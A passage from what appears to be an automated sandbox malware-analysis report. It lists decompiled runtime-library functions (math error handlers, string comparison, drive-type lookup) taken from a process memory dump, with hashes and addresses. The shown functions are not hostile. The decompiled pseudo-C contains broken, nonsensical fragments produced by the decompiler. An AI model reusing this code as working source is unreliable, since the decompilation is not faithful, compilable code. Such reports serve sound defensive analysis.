                                                                                                                                                              0x7ff6e4c7caca
                                                                                                                                                              0x7ff6e4c7cad2
                                                                                                                                                              0x7ff6e4c7cad7
                                                                                                                                                              0x7ff6e4c7cad9
                                                                                                                                                              0x7ff6e4c7cade
                                                                                                                                                              0x7ff6e4c7cae1
                                                                                                                                                              0x7ff6e4c7cae5
                                                                                                                                                              0x7ff6e4c7caeb
                                                                                                                                                              0x7ff6e4c7caf1
                                                                                                                                                              0x7ff6e4c7caf9
                                                                                                                                                              0x7ff6e4c7cb02
                                                                                                                                                              0x7ff6e4c7cb0a
                                                                                                                                                              0x7ff6e4c7cb0c
                                                                                                                                                              0x7ff6e4c7cb11
                                                                                                                                                              0x7ff6e4c7cb15
                                                                                                                                                              0x7ff6e4c7cb1b
                                                                                                                                                              0x7ff6e4c7cb21
                                                                                                                                                              0x7ff6e4c7cb26
                                                                                                                                                              0x7ff6e4c7cb2b
                                                                                                                                                              0x7ff6e4c7cb32
                                                                                                                                                              0x7ff6e4c7cb43
                                                                                                                                                              0x7ff6e4c7cb44
                                                                                                                                                              0x7ff6e4c7cb46
                                                                                                                                                              0x7ff6e4c7cb4b
                                                                                                                                                              0x7ff6e4c7cb4e
                                                                                                                                                              0x7ff6e4c7cb5e

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _handle_errorf
                                                                                                                                                              • String ID: "$powf
                                                                                                                                                              • API String ID: 2315412904-603753351
                                                                                                                                                              • Opcode ID: 2fd99ede9f727ad468451214f46e480e14a4ac1394bb756aec66fcfc7979fa05
                                                                                                                                                              • Instruction ID: 2d0ca59bf556ab9b9904c2b02231f33ad91104d1543a2c6cb71ad8ab88a7a838
                                                                                                                                                              • Opcode Fuzzy Hash: 2fd99ede9f727ad468451214f46e480e14a4ac1394bb756aec66fcfc7979fa05
                                                                                                                                                              • Instruction Fuzzy Hash: C0413E7792CA829BD370CF32E0847AAB6A0F799748F101326F749429D8CF7ED5509B45
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C7A798 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E00007FF67FF6E4C7A798(signed short* __rbx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a16) {
				void* _v8;
				signed long long _v24;
				short _v550;
				signed int _v552;
				void* _t24;
				void* _t25;
				void* _t26;
				signed short _t30;
				void* _t31;
				void* _t32;
				void* _t36;
				signed long long _t43;
				signed long long _t44;
				long long* _t47;
				void* _t70;

				_a8 = __rbx;
				_a16 = __rsi;
				_t71 = _t70 - 0x240;
				_t43 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_t44 = _t43 ^ _t70 - 0x00000240;
				_v24 = _t44;
				r8d = 0x20a;
				_t25 = E00007FF67FF6E4C64A30(_t24, _t31,  &_v552, 0, __r8);
				 *_t44 =  *_t44 + _t25;
				if (_t44 - 0x104 > 0) goto 0xe4c7a80d;
				if (_t30 == 0) goto 0xe4c7a86c;
				if (_v550 != 0x3a) goto 0xe4c7a86c;
				_t36 = _t25 - 0x19;
				if (_t36 > 0) goto 0xe4c7a808;
				_t47 = (_t30 & 0x0000ffff) - 0x20;
				goto 0xe4c7a86c;
				asm("int 0xff");
				_push( *__rbx);
				 *((long long*)(_t47 - 0x75)) =  *((long long*)(_t47 - 0x75)) - 1;
				 *(_t47 - 0x40 + (_v552 & 0x0000ffff) + 0x48) =  *(_t47 - 0x40 + (_v552 & 0x0000ffff) + 0x48) << 0x8b;
				asm("ror byte [ebx-0x10ea0032], 1");
				goto 0xa54ca833;
				if (_t36 != 0) goto 0xe4c7a842;
				_t26 = E00007FF67FF6E4C6C854(_t47);
				 *_t47 = 0xc;
				goto 0xe4c7a864;
				if ( *__rbx == _t32) goto 0xe4c7a864;
				if (__rbx[1] != 0x3a) goto 0xe4c7a864;
				if (_t26 - 0x61 - 0x19 > 0) goto 0xe4c7a861;
				return E00007FF67FF6E4C623B0(E00007FF67FF6E4C76B28(( *__rbx & 0x0000ffff) - 0x20, __rbx), _t30,  *(_t70 - 0x240 + 0x230) ^ _t71);
			}


















                                                                                                                                                              0x7ff6e4c7a798
                                                                                                                                                              0x7ff6e4c7a79d
                                                                                                                                                              0x7ff6e4c7a7a3
                                                                                                                                                              0x7ff6e4c7a7aa
                                                                                                                                                              0x7ff6e4c7a7b1
                                                                                                                                                              0x7ff6e4c7a7b4
                                                                                                                                                              0x7ff6e4c7a7c3
                                                                                                                                                              0x7ff6e4c7a7c9
                                                                                                                                                              0x7ff6e4c7a7dc
                                                                                                                                                              0x7ff6e4c7a7e3
                                                                                                                                                              0x7ff6e4c7a7ef
                                                                                                                                                              0x7ff6e4c7a7f7
                                                                                                                                                              0x7ff6e4c7a7fc
                                                                                                                                                              0x7ff6e4c7a803
                                                                                                                                                              0x7ff6e4c7a805
                                                                                                                                                              0x7ff6e4c7a80b
                                                                                                                                                              0x7ff6e4c7a819
                                                                                                                                                              0x7ff6e4c7a81b
                                                                                                                                                              0x7ff6e4c7a81d
                                                                                                                                                              0x7ff6e4c7a823
                                                                                                                                                              0x7ff6e4c7a828
                                                                                                                                                              0x7ff6e4c7a82e
                                                                                                                                                              0x7ff6e4c7a833
                                                                                                                                                              0x7ff6e4c7a835
                                                                                                                                                              0x7ff6e4c7a83a
                                                                                                                                                              0x7ff6e4c7a840
                                                                                                                                                              0x7ff6e4c7a845
                                                                                                                                                              0x7ff6e4c7a84c
                                                                                                                                                              0x7ff6e4c7a85c
                                                                                                                                                              0x7ff6e4c7a892

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                              • String ID: :
                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                              • Opcode ID: ab82874d5ed6b2a598765b1a342cad242f235eefb6005fd23b848694f996d126
                                                                                                                                                              • Instruction ID: eeebacaff1bd75d95f4072a0355a02d8c0ee599d2502f68ad68b0795ceaeb901
                                                                                                                                                              • Opcode Fuzzy Hash: ab82874d5ed6b2a598765b1a342cad242f235eefb6005fd23b848694f996d126
                                                                                                                                                              • Instruction Fuzzy Hash: 5C219C2BA4C64386F7209B36908837D72B1EB84F44F448037EA4D87AC5DF7EE542C616
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C7C8B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 61%
                                                                                                                                                              			E00007FF67FF6E4C7C8B0(void* __rax, long long _a32, long long _a40, long long _a64, void* _a80) {
				void* _v40;
				long long _v56;
				long long _v80;
				long long _v88;
				long long _t16;
				void* _t17;
				void* _t18;
				void* _t20;
				intOrPtr* _t29;

				asm("pushad");
				asm("movaps xmm6, xmm2");
				_t18 = r9d - _t16;
				if (_t18 == 0) goto 0xe4c7c988;
				if (_t18 <= 0) goto 0xe4c7c9c7;
				if (r9d - 5 <= 0) goto 0xe4c7c96f;
				_t20 = r9d - 6;
				if (_t20 == 0) goto 0xe4c7c947;
				if (_t20 <= 0) goto 0xe4c7c9c7;
				if (r9d - 8 <= 0) goto 0xe4c7c91f;
				if (r9d != 9) goto 0xe4c7c9c7;
				_v56 = 0x2;
				r9d = 0x2474290f00000003;
				asm("movsd [esp+0x38], xmm1");
				asm("movsd [esp+0x30], xmm0");
				_v80 = 0x22;
				_v88 = 0x11;
				goto 0xe4c7c9ab;
				_v56 = 0x2;
				r9d = 4;
				asm("movsd [esp+0x38], xmm1");
				asm("movsd [esp+0x30], xmm0");
				_v80 = 0x22;
				_v88 = 0x12;
				goto 0xe4c7c9ab;
				_v56 = 0x2;
				r9d = 1;
				asm("movsd [esp+0x38], xmm1");
				asm("movsd [esp+0x30], xmm0");
				_v80 = 0x21;
				_v88 = 8;
				goto 0xe4c7c9ab;
				asm("movsd [esp+0x50], xmm6");
				asm("movaps xmm6, [esp+0x60]");
				goto 0xe4c84ca4;
				_a64 = 0x2;
				r9d = _t16;
				asm("movsd [esp+0x38], xmm1");
				asm("movsd [esp+0x30], xmm0");
				_a40 = 0x22;
				_a32 = 4;
				asm("movsd [esp+0x50], xmm6");
				 *_t29 =  *_t29 + _t17;
				sil = sil - _t16;
				asm("movaps xmm6, [esp+0x60]");
				return _t16;
			}












                                                                                                                                                              0x7ff6e4c7c8bd
                                                                                                                                                              0x7ff6e4c7c8be
                                                                                                                                                              0x7ff6e4c7c8c1
                                                                                                                                                              0x7ff6e4c7c8c4
                                                                                                                                                              0x7ff6e4c7c8ca
                                                                                                                                                              0x7ff6e4c7c8d4
                                                                                                                                                              0x7ff6e4c7c8da
                                                                                                                                                              0x7ff6e4c7c8de
                                                                                                                                                              0x7ff6e4c7c8e0
                                                                                                                                                              0x7ff6e4c7c8ea
                                                                                                                                                              0x7ff6e4c7c8f0
                                                                                                                                                              0x7ff6e4c7c8f6
                                                                                                                                                              0x7ff6e4c7c8fa
                                                                                                                                                              0x7ff6e4c7c8fe
                                                                                                                                                              0x7ff6e4c7c904
                                                                                                                                                              0x7ff6e4c7c90a
                                                                                                                                                              0x7ff6e4c7c912
                                                                                                                                                              0x7ff6e4c7c91a
                                                                                                                                                              0x7ff6e4c7c91f
                                                                                                                                                              0x7ff6e4c7c923
                                                                                                                                                              0x7ff6e4c7c929
                                                                                                                                                              0x7ff6e4c7c92f
                                                                                                                                                              0x7ff6e4c7c935
                                                                                                                                                              0x7ff6e4c7c93d
                                                                                                                                                              0x7ff6e4c7c945
                                                                                                                                                              0x7ff6e4c7c947
                                                                                                                                                              0x7ff6e4c7c94b
                                                                                                                                                              0x7ff6e4c7c951
                                                                                                                                                              0x7ff6e4c7c957
                                                                                                                                                              0x7ff6e4c7c95d
                                                                                                                                                              0x7ff6e4c7c965
                                                                                                                                                              0x7ff6e4c7c96d
                                                                                                                                                              0x7ff6e4c7c96f
                                                                                                                                                              0x7ff6e4c7c97a
                                                                                                                                                              0x7ff6e4c7c983
                                                                                                                                                              0x7ff6e4c7c988
                                                                                                                                                              0x7ff6e4c7c98c
                                                                                                                                                              0x7ff6e4c7c98f
                                                                                                                                                              0x7ff6e4c7c995
                                                                                                                                                              0x7ff6e4c7c99b
                                                                                                                                                              0x7ff6e4c7c9a3
                                                                                                                                                              0x7ff6e4c7c9ab
                                                                                                                                                              0x7ff6e4c7c9c6
                                                                                                                                                              0x7ff6e4c7c9c8
                                                                                                                                                              0x7ff6e4c7c9ca
                                                                                                                                                              0x7ff6e4c7c9d3

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _handle_error
                                                                                                                                                              • String ID: "$pow
                                                                                                                                                              • API String ID: 1757819995-713443511
                                                                                                                                                              • Opcode ID: b1ca8cfd3d724a5af3e010f86cad1af7ad89acb5d819fa7540bd4a813af05ec3
                                                                                                                                                              • Instruction ID: bf733e3b707c0fd429a0c65ddc76dc08b6db4936e0735a4fb4d7947673aa26fc
                                                                                                                                                              • Opcode Fuzzy Hash: b1ca8cfd3d724a5af3e010f86cad1af7ad89acb5d819fa7540bd4a813af05ec3
                                                                                                                                                              • Instruction Fuzzy Hash: E1317C77D1CA8683D7B0CF30E08476AAAB0FBDA744F201326F68946995DF7ED1818B05
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C7A3EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                              			E00007FF67FF6E4C7A3EC(void* __ecx, void* __edx, void* __r8, void* _a24, long long _a28, long long _a32, long long _a36, long long _a40, long long _a44, intOrPtr _a48) {
				long long _v20;
				long long _v24;
				long long _v28;
				long long _v32;
				long long _v36;
				long long _v40;
				void* _v48;
				signed long long _v56;
				void* __rbx;
				void* _t32;
				void* _t33;
				void* _t36;
				long long _t45;
				long long _t50;
				signed long long _t52;
				signed long long _t54;
				void* _t60;
				void* _t62;
				void* _t63;

				_t34 = __ecx;
				asm("movsd [esp+0x20], xmm3");
				asm("movsd [esp+0x18], xmm2");
				_t52 = _t54;
				r8d = 0;
				if ( *0xe4c97f40 == _t60) goto 0xe4c7a427;
				r8d = r8d + 1;
				if (0x7ff6e4c97f50 - 0xe4c98110 < 0) goto 0xe4c7a40c;
				goto 0xe4c7a432;
				_t45 =  *((intOrPtr*)(0xe4c97f40 + 8 + (r8d + r8d) * 8));
				 *((intOrPtr*)(_t45 - 0x7b)) =  *((intOrPtr*)(_t45 - 0x7b)) - __ecx;
				 *(_t63 - 0x50 + _t52 * 2 - 0x75) =  *(_t63 - 0x50 + _t52 * 2 - 0x75) << 0x44;
				_v40 = _t45;
				_v36 = _a28;
				_v32 = _a32;
				_v28 = _a36;
				_v24 = _a40;
				_t50 = _a44;
				_v20 = _t50;
				_v56 = _t52;
				E00007FF67FF6E4C7A68C(_t33, _t36, _t52, _a48, 0xffc0, _t62);
				E00007FF67FF6E4C72A20(__edx,  &_v56);
				if (_t50 != 0) goto 0xe4c7a49d;
				E00007FF67FF6E4C7A3BC(_t34, _t50, _t52);
				asm("movsd xmm0, [esp+0x40]");
				goto 0xe4c7a4ba;
				E00007FF67FF6E4C7A68C(_t33, _t36, _t52, _t52, 0xffc0, _t62);
				_t32 = E00007FF67FF6E4C7A3BC(_t34, _t50, _t52);
				asm("movsd xmm0, [esp+0x80]");
				return _t32;
			}






















                                                                                                                                                              0x7ff6e4c7a3ec
                                                                                                                                                              0x7ff6e4c7a3ec
                                                                                                                                                              0x7ff6e4c7a3f2
                                                                                                                                                              0x7ff6e4c7a404
                                                                                                                                                              0x7ff6e4c7a409
                                                                                                                                                              0x7ff6e4c7a40e
                                                                                                                                                              0x7ff6e4c7a410
                                                                                                                                                              0x7ff6e4c7a421
                                                                                                                                                              0x7ff6e4c7a425
                                                                                                                                                              0x7ff6e4c7a42d
                                                                                                                                                              0x7ff6e4c7a443
                                                                                                                                                              0x7ff6e4c7a446
                                                                                                                                                              0x7ff6e4c7a44d
                                                                                                                                                              0x7ff6e4c7a455
                                                                                                                                                              0x7ff6e4c7a45d
                                                                                                                                                              0x7ff6e4c7a465
                                                                                                                                                              0x7ff6e4c7a470
                                                                                                                                                              0x7ff6e4c7a474
                                                                                                                                                              0x7ff6e4c7a47b
                                                                                                                                                              0x7ff6e4c7a47f
                                                                                                                                                              0x7ff6e4c7a483
                                                                                                                                                              0x7ff6e4c7a48d
                                                                                                                                                              0x7ff6e4c7a494
                                                                                                                                                              0x7ff6e4c7a498
                                                                                                                                                              0x7ff6e4c7a49d
                                                                                                                                                              0x7ff6e4c7a4a3
                                                                                                                                                              0x7ff6e4c7a4a5
                                                                                                                                                              0x7ff6e4c7a4ac
                                                                                                                                                              0x7ff6e4c7a4b1
                                                                                                                                                              0x7ff6e4c7a4bf

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _set_errno_from_matherr
                                                                                                                                                              • String ID: exp
                                                                                                                                                              • API String ID: 1187470696-113136155
                                                                                                                                                              • Opcode ID: af4f04c681340cc62c74280ad69826c7d89225c328194b63a605903c09ba30a0
                                                                                                                                                              • Instruction ID: 124f4d3fe089643a576c85034c919ab2279a9a3589a69664ef9cfa46f762f5e6
                                                                                                                                                              • Opcode Fuzzy Hash: af4f04c681340cc62c74280ad69826c7d89225c328194b63a605903c09ba30a0
                                                                                                                                                              • Instruction Fuzzy Hash: C121EA6BA5D6468BD760CF38A48426A72B0FB98B00F506536F68DC3F95DE3ED4408F09
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C77918 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareStringtry_get_function
                                                                                                                                                              • String ID: CompareStringEx
                                                                                                                                                              • API String ID: 3328479835-2590796910
                                                                                                                                                              • Opcode ID: 7c9bd78ff792a9350ac64235ae9f84f3d36b9cefda3b74ebcb642370a91b1f43
                                                                                                                                                              • Instruction ID: 32c3779e43bbbe866ed753a45180ad677b580e067518f468c339394a6c68aa84
                                                                                                                                                              • Opcode Fuzzy Hash: 7c9bd78ff792a9350ac64235ae9f84f3d36b9cefda3b74ebcb642370a91b1f43
                                                                                                                                                              • Instruction Fuzzy Hash: A011293A60DBC186D7608B25B4802AAB7B1FBC9B94F144136EA8D83B59CF3DD5508B45
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C77DCC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Stringtry_get_function
                                                                                                                                                              • String ID: LCMapStringEx
                                                                                                                                                              • API String ID: 2588686239-3893581201
                                                                                                                                                              • Opcode ID: 83aca0db0f3a8315e0111171c4ce976db05bd8cac1dbedf6c627e18acb453d25
                                                                                                                                                              • Instruction ID: 6902c4d691d635563d6c8ec1fdc42d24fe851815120b870ae7beb3e30e7e225a
                                                                                                                                                              • Opcode Fuzzy Hash: 83aca0db0f3a8315e0111171c4ce976db05bd8cac1dbedf6c627e18acb453d25
                                                                                                                                                              • Instruction Fuzzy Hash: 9711003664DB828AD760CB25B4802AAB7B5F7C9B84F544136EE8D83B59CF3DD8408B05
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C41300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __std_exception_copy
                                                                                                                                                              • String ID: 123$string too long
                                                                                                                                                              • API String ID: 592178966-2834708651
                                                                                                                                                              • Opcode ID: 4126c1d795f5d8cea28ec14a9109678f809a706d01ed85b62b8ff687cfa04a9c
                                                                                                                                                              • Instruction ID: e8229a4fe1672085ee21d2ddd3f9132bf8a9f1bed01417e419a57ba208546f16
                                                                                                                                                              • Opcode Fuzzy Hash: 4126c1d795f5d8cea28ec14a9109678f809a706d01ed85b62b8ff687cfa04a9c
                                                                                                                                                              • Instruction Fuzzy Hash: 21E03926A95A06A0DA059F31E8C02A82370AB2CF54B88D132DA5C87351EF3DE1E5C346
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C743BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E00007FF67FF6E4C743BC(void* __ecx) {
				signed int _v16;
				short _v18;
				long long _v22;
				short _v24;
				short _t15;
				void* _t17;
				signed long long _t23;
				signed long long _t24;
				void* _t29;
				signed long long _t33;

				_t17 = __ecx;
				_t23 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_t24 = _t23 ^ _t33;
				_v16 = _t24;
				if (_t29 - 0x1a <= 0) goto 0xe4c743f5;
				E00007FF67FF6E4C6C834(_t24);
				 *_t24 = 0xf;
				E00007FF67FF6E4C6C854(_t24);
				 *_t24 = 0xd;
				E00007FF67FF6E4C6A5D8();
				goto 0xe4c74429;
				if (_t29 != 0) goto 0xe4c74400;
				goto 0xe4c74429;
				_v22 = 0x5c003a;
				_v24 = _t17 + 0x40;
				_v18 = _t15;
				return E00007FF67FF6E4C623B0(GetDriveTypeW(??), _t17 + 0x40, _v16 ^ _t33);
			}













                                                                                                                                                              0x7ff6e4c743bc
                                                                                                                                                              0x7ff6e4c743c2
                                                                                                                                                              0x7ff6e4c743c9
                                                                                                                                                              0x7ff6e4c743cc
                                                                                                                                                              0x7ff6e4c743d4
                                                                                                                                                              0x7ff6e4c743d6
                                                                                                                                                              0x7ff6e4c743db
                                                                                                                                                              0x7ff6e4c743e1
                                                                                                                                                              0x7ff6e4c743e6
                                                                                                                                                              0x7ff6e4c743ec
                                                                                                                                                              0x7ff6e4c743f3
                                                                                                                                                              0x7ff6e4c743f9
                                                                                                                                                              0x7ff6e4c743fe
                                                                                                                                                              0x7ff6e4c74404
                                                                                                                                                              0x7ff6e4c7440c
                                                                                                                                                              0x7ff6e4c74416
                                                                                                                                                              0x7ff6e4c7443b

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: :
                                                                                                                                                              • API String ID: 3215553584-336475711
                                                                                                                                                              • Opcode ID: cb95aaeb99d0489b0ef15f0af2b4abd9ee39852439bcbdf65d8bc42a4723b0bc
                                                                                                                                                              • Instruction ID: 5af5e9da94d102d4e8c9567698a6a1e476bb78df5cc4307dc7c6d58bc48175bd
                                                                                                                                                              • Opcode Fuzzy Hash: cb95aaeb99d0489b0ef15f0af2b4abd9ee39852439bcbdf65d8bc42a4723b0bc
                                                                                                                                                              • Instruction Fuzzy Hash: 5C018F2B95C24386F720AB71A49637A62B0EF88F08F805037D95DC3691DF2EE1448A1E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C77C3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
